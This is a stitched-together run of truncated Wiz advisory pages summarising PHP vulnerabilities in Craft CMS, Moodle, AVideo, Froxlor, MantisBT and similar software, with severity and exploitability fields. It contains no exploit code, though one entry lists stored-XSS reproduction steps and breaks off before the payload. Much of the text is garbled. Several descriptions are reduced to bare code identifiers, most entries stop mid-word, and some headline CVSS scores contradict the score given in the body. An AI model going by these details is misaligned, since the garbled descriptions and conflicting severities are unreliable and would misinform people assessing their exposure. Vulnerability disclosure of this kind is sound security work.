Craft is a platform for creating digital experiences. In Craft versions from 4.0.0-RC1 to before 4.17.0-beta.1 and 5.9.0-beta.1, there is a Privilege Escalation vulnerability in Craft CMS’s GraphQL API that allows an authenticated user with write access to one asset volume to escalate their privileges and modify/transfer assets belonging to any other volume, including restricted or private volumes to which they should not have access. The saveAsset GraphQL mutation validates authorization against the schema-resolved volume but fetches the target asset by ID without verifying that the asset belongs to the authorized volume. This allows unauthorized cross-volume asset modification and transfer. This vulnerability is fixed in 4.1
Wiz
CVE-2025-67848 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 8.1
CVE-2025-67848 [HIGH] CVE-2025-67848 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2025-67848 :
PHP vulnerability analysis and mitigation
A flaw was found in Moodle. This authentication bypass vulnerability allows suspended users to authenticate through the Learning Tools Interoperability (LTI) Provider. The issue arises from the LTI authentication handlers failing to enforce the user's suspension status, enabling unauthorized access to the system. This can lead to information disclosure or other unauthorized actions by users who should be restricted.
Source : NVD
## 8.1
Score
Published February 3, 2026
Severity HIGH
CNA Score 8.1
Affected Technologies
PHP
NixOS
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 15.3
Exploitation Probability (EPSS) 0.1
Affecte
Wiz
CVE-2025-51511 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 9.8
CVE-2025-51511 [CRITICAL] CVE-2025-51511 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2025-51511 :
PHP vulnerability analysis and mitigation
Cadmium CMS v.0.4.9 has a background arbitrary file upload vulnerability in /admin/content/filemanager/uploads.
Source : NVD
## 9.8
Score
Published December 23, 2025
Severity CRITICAL
CNA Score 9.8
Affected Technologies
PHP
Has Public Exploit Yes
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 22.8
Exploitation Probability (EPSS) 0.1
Affected packages and libraries
cadmium-org/cadmium-cms
Sources
NVD
Composer Severity HIGH No Fix Added at: Dec 24, 2025
## Get a CVE risk assessment
Get a prioritized view of CVEs in your cloud—so you can focus on what's exploitable, not just what's listed.
## Related PHP vulnerabilities:
CVE ID
Sever
Wiz
CVE-2026-1195 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 2.3
CVE-2026-1195 [LOW] CVE-2026-1195 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-1195 :
PHP vulnerability analysis and mitigation
A weakness has been identified in MineAdmin 1.x/2.x. This impacts the function refresh of the file /system/refresh of the component JWT Token Handler. This manipulation causes insufficient verification of data authenticity. It is possible to initiate the attack remotely. The attack is considered to have high complexity. The exploitability is said to be difficult. The exploit has been made available to the public and could be used for attacks. The vendor was contacted early about this disclosure but did not respond in any way.
Source : NVD
## 2.3
Score
Published January 20, 2026
Severity LOW
CNA Score 2.3
Affected Technologies
PHP
Has Public Exploit Yes
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due
Wiz
CVE-2026-2994 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 2.3
CVE-2026-2994 [LOW] CVE-2026-2994 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-2994 :
PHP vulnerability analysis and mitigation
Concrete CMS below version 9.4.8 is subject to CSRF by a Rogue Administrator using the Anti-Spam Allowlist Group Configuration via group_id parameter which can leads to a security bypass since changes are saved prior to checking the CSRF token. The Concrete CMS security team gave this vulnerability a CVSS v.4.0 score of 2.3 with vector CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:P/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N. Thanks z3rco for reporting
Source : NVD
## 2.3
Score
Published March 4, 2026
Severity LOW
CNA Score 2.3
Affected Technologies
PHP
Has Public Exploit Yes
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 6.3
Exploitation Probability (EPSS) N/A
Affected
Wiz
CVE-2026-34973 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 6.9
CVE-2026-34973 [MEDIUM] CVE-2026-34973 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-34973 :
PHP vulnerability analysis and mitigation
phpMyFAQ is an open source FAQ web application. Prior to version 4.1.1, the searchCustomPages() method in phpmyfaq/src/phpMyFAQ/Search.php uses real_escape_string() (via escape()) to sanitize the search term before embedding it in LIKE clauses. However, real_escape_string() does not escape SQL LIKE metacharacters % (match any sequence) and _ (match any single character). An unauthenticated attacker can inject these wildcards into search queries, causing them to match unintended records — including content that was not meant to be surfaced — resulting in information disclosure. This issue has been patched in version 4.1.1.
Source : NVD
## 6.9
Score
Published April 2, 2026
Severity MEDIUM
CNA Score 6.9
Affected Technolo
Wiz
CVE-2025-66578 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 6.0
CVE-2025-66578 [MEDIUM] CVE-2025-66578 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2025-66578 :
PHP vulnerability analysis and mitigation
xmlseclibs is a library written in PHP for working with XML Encryption and Signatures. Versions 3.1.3 contain an authentication bypass vulnerability due to a flaw in the libxml2 canonicalization process during document transformation. When libxml2’s canonicalization is invoked on an invalid XML input, it may return an empty string rather than a canonicalized node. xmlseclibs then proceeds to compute the DigestValue over this empty string, treating it as if canonicalization succeeded. This issue is fixed in version 3.1.4. Workarounds include treating canonicalization failures (exceptions or nil/empty outputs) as fatal and aborting validation, and/or adding explicit checks to reject when canonicalize returns nil/empty or raises
Wiz
CVE-2025-67510 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 9.4
CVE-2025-67510 [CRITICAL] CVE-2025-67510 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2025-67510 :
PHP vulnerability analysis and mitigation
Neuron is a PHP framework for creating and orchestrating AI Agents. In versions 2.8.11 and below, the MySQLWriteTool executes arbitrary SQL provided by the caller using PDO::prepare() + execute() without semantic restrictions. This is consistent with the name (“write tool”), but in an LLM/agent context it becomes a high-risk capability: prompt injection or indirect prompt manipulation can cause execution of destructive queries such as DROP TABLE, TRUNCATE, DELETE, ALTER, or privilege-related statements (subject to DB permissions). Deployments that expose an agent with MySQLWriteTool enabled to untrusted input and/or run the tool with a DB user that has broad privileges are impacted. This issue is fixed in version 2.8.12.
Sour
Wiz
CVE-2026-1194 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 5.5
CVE-2026-1194 [MEDIUM] CVE-2026-1194 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-1194 :
PHP vulnerability analysis and mitigation
A security flaw has been discovered in MineAdmin 1.x/2.x. This affects an unknown function of the component Swagger. The manipulation results in information disclosure. The attack may be performed from remote. The exploit has been released to the public and may be used for attacks. The vendor was contacted early about this disclosure but did not respond in any way.
Source : NVD
## 5.5
Score
Published January 20, 2026
Severity MEDIUM
CNA Score 5.5
Affected Technologies
PHP
Has Public Exploit Yes
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 17.5
Exploitation Probability (EPSS) 0.1
Affected packages and libraries
mineadmin/mineadmin
Sources
N
Wiz
CVE-2026-4267 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 5.3
CVE-2026-4267 [MEDIUM] CVE-2026-4267 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-4267 :
PHP vulnerability analysis and mitigation
The Query Monitor – The developer tools panel for WordPress plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via the ‘$_SERVER['REQUEST_URI']’ parameter in all versions up to, and including, 3.20.3 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link.
Source : NVD
## 7.2
Score
Published March 31, 2026
Severity HIGH
CNA Score 7.2
Affected Technologies
PHP
WordPress
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile
Wiz
CVE-2026-2469 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 7.2
CVE-2026-2469 [HIGH] CVE-2026-2469 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-2469 :
PHP vulnerability analysis and mitigation
Versions of the package directorytree/imapengine before 1.22.3 are vulnerable to Improper Neutralization of Special Elements in Output Used by a Downstream Component ('Injection') via the id() function in ImapConnection.php due to improperly escaping user input before including it in IMAP ID commands. This allows attackers to read or delete victim's emails, terminate the victim's session or execute any valid IMAP command on victim's mailbox by including quote characters " or CRLF sequences \r\n in the input.
Source : NVD
## 7.2
Score
Published February 14, 2026
Severity HIGH
CNA Score 7.2
Affected Technologies
PHP
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploi
Wiz
CVE-2026-26279 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 9.1
CVE-2026-26279 [CRITICAL] CVE-2026-26279 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-26279 :
PHP vulnerability analysis and mitigation
Froxlor is open source server administration software. Prior to 2.3.4, a typo in Froxlor's input validation code (== instead of =) completely disables email format checking for all settings fields declared as email type. This allows an authenticated admin to store arbitrary strings in the panel.adminmail setting. This value is later concatenated into a shell command executed as root by a cron job, where the pipe character | is explicitly whitelisted. The result is full root-level Remote Code Execution. This vulnerability is fixed in 2.3.4.
Source : NVD
## 9.1
Score
Published March 3, 2026
Severity CRITICAL
CNA Score 9.1
Affected Technologies
PHP
Has Public Exploit Yes
Has CISA KEV Exploit No
CISA KEV Release Date
Wiz
CVE-2026-35538 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 5.3
CVE-2026-35538 [MEDIUM] CVE-2026-35538 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-35538 :
PHP vulnerability analysis and mitigation
An issue was discovered in Roundcube Webmail before 1.5.14 and 1.6.14. Unsanitized IMAP SEARCH command arguments could lead to IMAP injection or CSRF bypass during mail search.
Source : NVD
## 3.1
Score
Published April 3, 2026
Severity LOW
CNA Score 3.1
Affected Technologies
PHP
Linux Debian
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 10.5
Exploitation Probability (EPSS) N/A
Affected packages and libraries
roundcube
roundcube/roundcubemail
Sources
NVD
Debian 11, 12, 13, 14 Severity LOW Has Fix Added at: Apr 05, 2026
Echo Severity LOW Has Fix Added at: Apr 05, 2026
Composer Severity LOW Has Fix Added at: Apr 05,
Wiz
CVE-2026-31891 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 7.7
CVE-2026-31891 [HIGH] CVE-2026-31891 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-31891 :
PHP vulnerability analysis and mitigation
/api/content/aggregate/{model}
_state=1
toJsonPath()
toJsonExtractRaw()
lib/MongoLite/Aggregation/Optimizer.php
Source : NVD
## 6.5
Score
Published March 18, 2026
Severity MEDIUM
CNA Score 7.7
Affected Technologies
PHP
NixOS
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 1.1
Exploitation Probability (EPSS) N/A
Affected packages and libraries
cockpit-hq/cockpit
cockpit
Sources
NVD
Composer Severity HIGH Has Fix Added at: Mar 17, 2026
Nix Severity MEDIUM Has Fix Added at: Mar 22, 2026
## Get a CVE risk assessment
Get a prioritized view of CVEs in your cloud—so you can focus on what's exploitable, not just wha
Wiz
GHSA-jg68-vhv3-9r8f Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 5.3
[MEDIUM] GHSA-jg68-vhv3-9r8f Impact, Exploitability, and Mitigation Steps | Wiz
## GHSA-jg68-vhv3-9r8f :
PHP vulnerability analysis and mitigation
## Impact
The admin url can be discovered without prior knowledge of it's location by exploiting the X-Original-Url header on some configurations.
## Patches
The bug comes from the Zend library and is patche by unsetting the header in the bootstrap process.
## Workarounds
X-Original-Url
## References
The activation of these headers is coming from the Zend_Controller module. It appears this has been known to some degree since 2016 - https://peterocallaghan.co.uk/2016/12/magento-poisoning-cache/ (dead link now..)
## Credit
Anees Hyder ( @anees0xdev ) via HackerOne https://hackerone.com/anees0x_dev/hacktivity
Source : NVD
## 5.3
Score
Published February 2, 2026
Severity MEDIUM
CNA Score N/A
Affecte
Wiz
CVE-2026-30849 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 9.3
CVE-2026-30849 [CRITICAL] CVE-2026-30849 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-30849 :
PHP vulnerability analysis and mitigation
Mantis Bug Tracker (MantisBT) is an open source issue tracker. Versions prior to 2.28.1 running on MySQL family databases are affected by an authentication bypass vulnerability in the SOAP API, as a result of an improper type checking on the password parameter. Other database backends are not affected, as they do not perform implicit type conversion from string to integer. Using a crafted SOAP envelope, an attacker knowing the victim's username is able to login to the SOAP API with their account without knowledge of the actual password, and execute any API function they have access to. Version 2.28.1 contains a patch. Disabling the SOAP API significantly reduces the risk, but still allows the attacker to retrieve user account
Wiz
CVE-2026-30662 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 6.5
CVE-2026-30662 [MEDIUM] CVE-2026-30662 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-30662 :
PHP vulnerability analysis and mitigation
ConcreteCMS v9.4.7 contains a Denial of Service (DoS) vulnerability in the File Manager component. The 'download' method in 'concrete/controllers/backend/file.php' improperly manages memory when creating zip archives. It uses 'ZipArchive::addFromString' combined with 'file_get_contents', which loads the entire content of every selected file into PHP memory. An authenticated attacker can exploit this by requesting a bulk download of large files, triggering an Out-Of-Memory (OOM) condition that causes the PHP-FPM process to terminate (SIGSEGV) and the web server to return a 500 error.
Source : NVD
## 6.5
Score
Published March 24, 2026
Severity MEDIUM
CNA Score 6.5
Affected Technologies
PHP
Has Public Exploit Yes
Has
Wiz
CVE-2025-61676 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 6.1
CVE-2025-61676 [MEDIUM] CVE-2025-61676 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2025-61676 :
PHP vulnerability analysis and mitigation
October is a Content Management System (CMS) and web platform. Prior to versions 3.7.13 and 4.0.12, a cross-site scripting (XSS) vulnerabilities was identified in October CMS backend configuration forms. A user with the Customize Backend Styles permission could inject malicious HTML/JS into the stylesheet input at Styles from Branding & Appearance settings. A specially crafted input could break out of the intended context, allowing arbitrary script execution across backend pages for all users. This issue has been patched in versions 3.7.13 and 4.0.12.
Source : NVD
## 4.8
Score
Published January 10, 2026
Severity MEDIUM
CNA Score 6.1
Affected Technologies
PHP
Homebrew
Has Public Exploit No
Has CISA KEV Exploit No
Wiz
CVE-2026-33882 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 6.5
CVE-2026-33882 [MEDIUM] CVE-2026-33882 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-33882 :
PHP vulnerability analysis and mitigation
Statamic is a Laravel and Git powered content management system (CMS). Prior to versions 5.73.16 and 6.7.2, the markdown preview endpoint could be manipulated to return augmented data from arbitrary fieldtypes. With the users fieldtype specifically, an authenticated control panel user could retrieve sensitive user data including email addresses, encrypted passkey data, and encrypted two-factor authentication codes. This has been fixed in 5.73.16 and 6.7.2.
Source : NVD
## 6.5
Score
Published March 27, 2026
Severity MEDIUM
CNA Score 6.5
Affected Technologies
PHP
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 17.5
Exploitati
Wiz
CVE-2025-67507 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 8.1
CVE-2025-67507 [HIGH] CVE-2025-67507 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2025-67507 :
PHP vulnerability analysis and mitigation
Filament is a collection of full-stack components for accelerated Laravel development. Versions 4.0.0 through 4.3.0 contain a flaw in the handling of recovery codes for app-based multi-factor authentication, allowing the same recovery code to be reused indefinitely. This issue does not affect email-based MFA. It also only applies when recovery codes are enabled. This issue is fixed in version 4.3.1.
Source : NVD
## 8.1
Score
Published December 10, 2025
Severity HIGH
CNA Score 8.1
Affected Technologies
PHP
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 26.6
Exploitation Probability (EPSS) 0.1
Affected packages and librarie
Wiz
CVE-2026-30964 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 5.4
CVE-2026-30964 [MEDIUM] CVE-2026-30964 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-30964 :
PHP vulnerability analysis and mitigation
web-auth/webauthn-lib is an open source set of PHP libraries and a Symfony bundle to allow developers to integrate that authentication mechanism into their web applications. Prior to 5.2.4, when allowed_origins is configured, CheckAllowedOrigins reduces URL-like values to their host component and accepts on host match alone. This makes exact origin policies impossible to express: scheme and port differences are silently ignored. This vulnerability is fixed in 5.2.4.
Source : NVD
## 5.4
Score
Published March 10, 2026
Severity MEDIUM
CNA Score 5.4
Affected Technologies
PHP
Wolfi
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS)
Wiz
CVE-2026-25491 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 1.9
CVE-2026-25491 [LOW] CVE-2026-25491 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-25491 :
PHP vulnerability analysis and mitigation
Craft is a platform for creating digital experiences. From 5.0.0-RC1 to 5.8.21, Craft has a stored XSS via Entry Type names. The name is not sanitized when displayed in the Entry Types list. This vulnerability is fixed in 5.8.22.
Source : NVD
## 1.9
Score
Published February 9, 2026
Severity LOW
CNA Score 1.9
Affected Technologies
PHP
Craft CMS
Has Public Exploit Yes
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 4.2
Exploitation Probability (EPSS) N/A
Affected packages and libraries
craftcms/cms
cpe:2.3:a:craftcms:craft_cms
Sources
Composer Severity LOW Has Fix Added at: Feb 10, 2026
Linux Severity MEDIUM Has Fix Added at: Feb 10, 2026
Wiz
CVE-2025-14180 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 8.2
CVE-2025-14180 [HIGH] CVE-2025-14180 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2025-14180 :
PHP vulnerability analysis and mitigation
In PHP versions 8.1.* before 8.1.34, 8.2.* before 8.2.30, 8.3.* before 8.3.29, 8.4.* before 8.4.16, 8.5.* before 8.5.1 when using the PDO PostgreSQL driver with PDO::ATTR_EMULATE_PREPARES enabled, an invalid character sequence (such as \x99) in a prepared statement parameter may cause the quoting function PQescapeStringConn to return NULL, leading to a null pointer dereference in pdo_parse_params() function. This may lead to crashes (segmentation fault) and affect the availability of the target server.
Source : NVD
## 8.2
Score
Published December 27, 2025
Severity HIGH
CNA Score 8.2
Affected Technologies
PHP
Rocky Linux
Has Public Exploit Yes
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/
Wiz
CVE-2026-21857 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 8.3
CVE-2026-21857 [HIGH] CVE-2026-21857 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-21857 :
PHP vulnerability analysis and mitigation
EXPDIR
../
.tar.gz
Source : NVD
## 8.3
Score
Published January 7, 2026
Severity HIGH
CNA Score 8.3
Affected Technologies
PHP
Has Public Exploit Yes
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 7.5
Exploitation Probability (EPSS) N/A
Affected packages and libraries
redaxo/source
Sources
NVD
Composer Severity HIGH Has Fix Added at: Jan 06, 2026
## Get a CVE risk assessment
Get a prioritized view of CVEs in your cloud—so you can focus on what's exploitable, not just what's listed.
## Related PHP vulnerabilities:
CVE ID
Severity
Score
Technologies
Component name
CISA KEV exploit
Has fix
Published date
GHSA-h6rj-3m53-887h
H
Wiz
CVE-2026-33347 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 6.3
CVE-2026-33347 [MEDIUM] CVE-2026-33347 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-33347 :
PHP vulnerability analysis and mitigation
league/commonmark is a PHP Markdown parser. From version 2.3.0 to before version 2.8.2, the DomainFilteringAdapter in the Embed extension is vulnerable to an allowlist bypass due to a missing hostname boundary assertion in the domain-matching regex. An attacker-controlled domain like youtube.com.evil passes the allowlist check when youtube.com is an allowed domain. This issue has been patched in version 2.8.2.
Source : NVD
## 6.3
Score
Published March 24, 2026
Severity MEDIUM
CNA Score 6.3
Affected Technologies
PHP
Linux Debian
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 17.7
Exploitation Probability (EPSS) 0.1
Affect
Wiz
CVE-2026-33717 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 8.8
CVE-2026-33717 [HIGH] CVE-2026-33717 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-33717 :
PHP vulnerability analysis and mitigation
downloadVideoFromDownloadURL()
objects/aVideoEncoder.json.php
.php
resolution
die()
forbiddenPage()
videos/cache/tmpFile/
Source : NVD
## 8.8
Score
Published March 23, 2026
Severity HIGH
CNA Score 8.8
Affected Technologies
PHP
Has Public Exploit Yes
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 15.5
Exploitation Probability (EPSS) 0.1
Affected packages and libraries
wwbn/avideo
Sources
NVD
Composer Severity HIGH No Fix Added at: Mar 26, 2026
## Get a CVE risk assessment
Get a prioritized view of CVEs in your cloud—so you can focus on what's exploitable, not just what's listed.
## Related PHP vulnerabilities:
CVE ID
Severity
Wiz
CVE-2026-21450 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 7.3
CVE-2026-21450 [HIGH] CVE-2026-21450 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-21450 :
PHP vulnerability analysis and mitigation
Bagisto is an open source laravel eCommerce platform. Versions prior to 2.3.10 are vulnerable to server-side template injection via type parameter, which can lead to remote code execution or another exploitation. Version 2.3.10 fixes the issue.
Source : NVD
## 7.3
Score
Published January 2, 2026
Severity HIGH
CNA Score 7.3
Affected Technologies
PHP
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 72.4
Exploitation Probability (EPSS) 0.7
Affected packages and libraries
bagisto/bagisto
Sources
NVD
Composer Severity HIGH Has Fix Added at: Jan 03, 2026
## Get a CVE risk assessment
Get a prioritized view of CVEs in your
Wiz
CVE-2026-33761 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 5.3
CVE-2026-33761 [MEDIUM] CVE-2026-33761 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-33761 :
PHP vulnerability analysis and mitigation
list.json.php
add.json.php
delete.json.php
index.php
User::isAdmin()
Source : NVD
## 5.3
Score
Published March 27, 2026
Severity MEDIUM
CNA Score 5.3
Affected Technologies
PHP
Has Public Exploit Yes
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 22.2
Exploitation Probability (EPSS) 0.1
Affected packages and libraries
wwbn/avideo
Sources
NVD
Composer Severity MEDIUM No Fix Added at: Mar 29, 2026
## Get a CVE risk assessment
Get a prioritized view of CVEs in your cloud—so you can focus on what's exploitable, not just what's listed.
## Related PHP vulnerabilities:
CVE ID
Severity
Score
Technologies
Component name
CISA KEV exp
Wiz
CVE-2026-30877 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 9.1
CVE-2026-30877 [CRITICAL] CVE-2026-30877 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-30877 :
PHP vulnerability analysis and mitigation
baserCMS is a website development framework. Prior to version 5.2.3, there is an OS command injection vulnerability in the update functionality. Due to this issue, an authenticated user with administrator privileges in baserCMS can execute arbitrary OS commands on the server with the privileges of the user account running baserCMS. This issue has been patched in version 5.2.3.
Source : NVD
## 7.2
Score
Published March 31, 2026
Severity HIGH
CNA Score 9.1
Affected Technologies
PHP
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 42.6
Exploitation Probability (EPSS) 0.2
Affected packages and libraries
baserproject/basercms
Wiz
CVE-2026-33683 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 5.4
CVE-2026-33683 [MEDIUM] CVE-2026-33683 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-33683 :
PHP vulnerability analysis and mitigation
xss_esc()
strip_specific_tags()
html_entity_decode()
Source : NVD
## 5.4
Score
Published March 23, 2026
Severity MEDIUM
CNA Score 5.4
Affected Technologies
PHP
Has Public Exploit Yes
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 8.6
Exploitation Probability (EPSS) N/A
Affected packages and libraries
wwbn/avideo
Sources
NVD
Composer Severity MEDIUM No Fix Added at: Mar 26, 2026
## Get a CVE risk assessment
Get a prioritized view of CVEs in your cloud—so you can focus on what's exploitable, not just what's listed.
## Related PHP vulnerabilities:
CVE ID
Severity
Score
Technologies
Component name
CISA KEV exploit
Has fix
Publ
Wiz
GHSA-h9r9-2pxg-cx9m Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz
GHSA-h9r9-2pxg-cx9m Impact, Exploitability, and Mitigation Steps | Wiz
## GHSA-h9r9-2pxg-cx9m :
PHP vulnerability analysis and mitigation
## Summary
## A stored XSS vulnerability in Craft Commerce allows attackers to execute malicious JavaScript in an administrator’s browser. This occurs because the Shipping Zone (Name & Description) fields in the Store Management section are not properly sanitized before being displayed in the admin panel.
## Proof of Concept
## Requirments
Access the control panel
Access Craft Commerce
Manage store settings
Manage shipping
An active administrator elevated session
## Steps to Reproduce
Log in to the Admin Panel with the attacker account with the permissions mentioned above.
/admin/commerce/store-management/primary/shippingzones
Create a new shipping zone.
In the Name field, enter the following payload:
Wiz
GHSA-5j8p-438x-rgg5 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 5.3
CVE-2025-66475 [MEDIUM] GHSA-5j8p-438x-rgg5 Impact, Exploitability, and Mitigation Steps | Wiz
## GHSA-5j8p-438x-rgg5 :
PHP vulnerability analysis and mitigation
Summary There is a critical vulnerability on xmlseclibs CVE-2025-66475 , a dependency of php-saml
Update to the following versions of php-saml which forces the use of patched versions of xmlseclibs:
2.21.1
3.8.1
4.3.1
Impact Signature Wrapping Vulnerabilities allows an attacker to impersonate a user.
Source : NVD
## 9.3
Score
Published December 9, 2025
Severity CRITICAL
CNA Score N/A
Affected Technologies
PHP
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) N/A
Exploitation Probability (EPSS) N/A
Affected packages and libraries
onelogin/php-saml
Sources
NVD
Composer Severity CRITICAL Has Fix Added at: Dec 09, 2
Wiz
CVE-2026-35168 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 8.8
CVE-2026-35168 [HIGH] CVE-2026-35168 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-35168 :
PHP vulnerability analysis and mitigation
OpenSTAManager is an open source management software for technical assistance and invoicing. Prior to version 2.10.2, the Aggiornamenti (Updates) module in OpenSTAManager contains a database conflict resolution feature (op=risolvi-conflitti-database) that accepts a JSON array of SQL statements via POST and executes them directly against the database without any validation, allowlist, or sanitization. An authenticated attacker with access to the Aggiornamenti module can execute arbitrary SQL statements including CREATE, DROP, ALTER, INSERT, UPDATE, DELETE, SELECT INTO OUTFILE, and any other SQL command supported by the MySQL server. Foreign key checks are explicitly disabled before execution (SET FOREIGN_KEY_CHECKS=0), further
Wiz
CVE-2026-29093 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 8.1
CVE-2026-29093 [HIGH] CVE-2026-29093 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-29093 :
PHP vulnerability analysis and mitigation
WWBN AVideo is an open source video platform. Prior to version 24.0, the official docker-compose.yml publishes the memcached service on host port 11211 (0.0.0.0:11211) with no authentication, while the Dockerfile configures PHP to store all user sessions in that memcached instance. An attacker who can reach port 11211 can read, modify, or flush session data — enabling session hijacking, admin impersonation, and mass session destruction without any application-level authentication. This issue has been patched in version 24.0.
Source : NVD
## 9.8
Score
Published March 6, 2026
Severity CRITICAL
CNA Score 8.1
Affected Technologies
PHP
Has Public Exploit Yes
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV D
Wiz
CVE-2026-22243 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 8.7
CVE-2026-22243 [HIGH] CVE-2026-22243 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-22243 :
